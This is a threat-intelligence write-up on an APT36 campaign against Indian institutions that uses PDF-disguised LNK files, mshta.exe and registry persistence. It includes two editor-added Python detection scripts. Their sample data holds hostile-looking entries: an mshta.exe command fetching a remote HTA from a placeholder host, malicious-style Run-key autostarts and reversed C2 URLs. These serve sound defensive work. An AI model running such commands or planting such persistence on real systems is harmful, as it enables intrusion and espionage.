A sophisticated cyber espionage campaign attributed to APT36, also known as Transparent Tribe, is actively targeting Indian government and academic institutions. The operation utilizes a multi-stage approach centered around weaponized LNK files disguised as PDF documents, aiming to deliver malicious payloads and establish persistent access. Security researchers have observed the campaign leveraging advanced techniques to evade detection and maintain a foothold within targeted networks.
The initial attack vector involves spear-phishing emails containing LNK files. These files masquerade as legitimate PDF documents to entice recipients into opening them. Upon execution, the LNK file launches an HTA script through mshta.exe, enabling fileless payload delivery. Because no conventional executable is dropped to disk at this stage, the technique bypasses traditional security measures that rely on file-based detection.
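The execution chain above (a shortcut dressed up as a PDF that hands control to mshta.exe) leaves a recognisable trace in process-creation telemetry. The following is an added detection example written by the editor, not code from the campaign report: it scores Sysmon-style process events for the double-extension lure name, mshta.exe being spawned directly by explorer.exe, and mshta.exe being given a remote URL or inline script. The events, the `LureFile` field (standing in for a correlated file-create event) and the `placeholder-c2.invalid` host are all constructed.

```python
"""Detect the LNK -> mshta.exe chain on sample process-creation telemetry.
Added example; event records and field names are constructed, Sysmon-style
approximations, not data taken from the campaign."""
import re
from typing import Dict, List

# Constructed sample events (simplified Sysmon Event ID 1 fields).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Benign: user opens a real PDF from Explorer.
        "Image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Adobe\Acrobat\Acrobat.exe" C:\Users\u\Downloads\budget.pdf',
    },
    {   # Suspicious: double-extension shortcut opened from Explorer, whose
        # target runs mshta.exe against a remote HTA (host is a placeholder).
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"mshta.exe http://placeholder-c2.invalid/advisory.hta",
        "LureFile": r"C:\Users\u\Downloads\Advisory_2024.pdf.lnk",  # constructed field
    },
    {   # Low-signal: mshta run from a shell against a local HTA.
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"mshta.exe C:\Windows\System32\admin-ui.hta",
    },
]

DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png)\.lnk$", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"(javascript|vbscript):", re.IGNORECASE)
REMOTE_TARGET = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)


def is_double_extension_lure(path: str) -> bool:
    """True for shortcut names that imitate a document, e.g. 'x.pdf.lnk'."""
    return DOUBLE_EXT.search(path) is not None


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons: List[str] = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if image.endswith("\\mshta.exe"):
        # A shortcut double-clicked in Explorer makes explorer.exe the parent.
        if parent.endswith("\\explorer.exe"):
            reasons.append("mshta.exe spawned directly by explorer.exe")
        if REMOTE_TARGET.search(cmd):
            reasons.append("mshta.exe given a remote URL (fileless HTA fetch)")
        if INLINE_SCRIPT.search(cmd):
            reasons.append("mshta.exe given inline script (javascript:/vbscript:)")
    lure = event.get("LureFile", "")
    if lure and is_double_extension_lure(lure):
        name = lure.rsplit("\\", 1)[-1]
        reasons.append(f"double-extension lure file: {name}")
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run score_event over a batch and keep only events with findings."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append({"event": ev, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["event"]["CommandLine"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The parent-process check is the strongest single signal here: legitimate mshta.exe use from an interactive Explorer session is rare in most environments, so it can be alerted on with a short allow-list, while the URL and double-extension checks add context for triage.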
Once the HTA script is executed, it initiates a series of in-memory decryption routines to reconstruct the final malware payload. The malware then establishes registry-based persistence mechanisms to ensure long-term access, even after system reboots. The campaign also employs obfuscated command-and-control (C2) infrastructure, utilizing reversed HTTP endpoints to communicate with external servers and exfiltrate stolen data. While a C2 server was registered in mid-April 2025, it is currently inactive.
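Two of the artifacts described above are easy to triage once you know what to look for: registry Run-key autostarts that point a script or proxy host at a user-writable path, and C2 endpoints stored as reversed strings. The following helper is an added example by the editor, not code from the report. It assumes the "reversed HTTP endpoints" are plain character-reversed URLs (an interpretation, not something the page states), and all registry values, paths and strings below are constructed samples.

```python
"""Triage helpers for Run-key persistence and reversed-string C2 endpoints.
Added example; every registry value, path and string here is constructed,
and the reversal logic assumes a simple character-reversed URL."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run values.
SAMPLE_RUN_VALUES: List[Tuple[str, str]] = [
    ("OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("WinUpdate", r'mshta.exe "C:\Users\u\AppData\Roaming\svc\upd.hta"'),
    ("Helper", r"rundll32.exe C:\Users\Public\Libraries\placeholder.dll,Start"),
    ("Realtek", r'"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s'),
]

# Constructed strings as they might appear in a decrypted configuration.
SAMPLE_STRINGS: List[str] = [
    "atad/dilavni.redlohecalp.2c//:ptth",  # http://c2.placeholder.invalid/data reversed
    "reportingPath",                        # ordinary string, not a URL
    "ath/dilavni.etadpu//:sptth",           # https://update.invalid/hta reversed
    "http://update.invalid/real",           # forward URL, reversing breaks it
]

SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
                "regsvr32.exe", "powershell.exe")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData|Downloads)\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(hta|js|vbs)\b", re.IGNORECASE)


def triage_run_value(name: str, data: str) -> List[str]:
    """Reasons a Run-key value merits analyst review (empty list if none)."""
    reasons: List[str] = []
    lowered = data.lower()
    host = next((h for h in SCRIPT_HOSTS if h in lowered), None)
    if host:
        reasons.append(f"{name}: autostart via script/proxy host {host}")
        # Legitimate software rarely autostarts a proxy host from user-writable dirs.
        if USER_WRITABLE.search(data):
            reasons.append(f"{name}: target lives under a user-writable directory")
    if SCRIPT_EXT.search(data):
        reasons.append(f"{name}: script file used as autostart target")
    return reasons


def triage_run_values(values: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Apply triage_run_value to a whole key; keep only values with findings."""
    return {n: r for n, d in values if (r := triage_run_value(n, d))}


def recover_reversed_url(s: str) -> Optional[str]:
    """If reversing s yields a well-formed http(s) URL, return it, else None."""
    candidate = s[::-1]
    parsed = urlparse(candidate)
    if parsed.scheme in ("http", "https") and parsed.netloc and "." in parsed.netloc:
        return candidate
    return None


def find_reversed_endpoints(strings: List[str]) -> Dict[str, str]:
    """Map each reversed-string artifact to the endpoint it conceals."""
    found: Dict[str, str] = {}
    for s in strings:
        url = recover_reversed_url(s)
        if url:
            found[s] = url
    return found


if __name__ == "__main__":
    for value, reasons in triage_run_values(SAMPLE_RUN_VALUES).items():
        print(value, "->", "; ".join(reasons))
    for raw, url in find_reversed_endpoints(SAMPLE_STRINGS).items():
        print(f"{raw!r} conceals {url}")
```

Recovered endpoints should be treated as indicators for blocking and retrospective log searches rather than contacted directly; the page notes the observed C2 server was registered in mid-April 2025 and is currently inactive, so historical proxy and DNS logs are where a hit is most likely.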
The malware delivered in this campaign includes an MSI payload and a Remote Access Trojan (RAT). The RAT, implemented through a malicious DLL (iinneldc.dll), provides attackers with remote control over compromised systems. Attackers have adapted their persistence methods to evade detection by various antivirus solutions, including Quick Heal, Avast, AVG, and Avira. A decoy PDF file mimicking a legitimate advisory from PKCERT issued in 2024 is also used to further disguise the malicious intent.
APT36, a threat actor known to be aligned with Pakistan, has a history of targeting Indian governmental entities with cyber espionage operations. This latest campaign demonstrates the group’s continued focus on India and its willingness to employ advanced techniques to achieve its objectives. The use of LNK files, fileless execution, and adaptive persistence highlights the sophistication of the threat and the importance of robust security measures to protect against such attacks. The campaign’s targeting of both government and academic entities underscores the broad scope of APT36’s interests.
Organizations and individuals in India are advised to remain vigilant and implement security best practices, including scrutinizing email attachments, keeping software up to date, and utilizing multi-factor authentication. Further investigation into the campaign’s tactics, techniques, and procedures (TTPs) is ongoing to better understand the threat and develop effective mitigation strategies.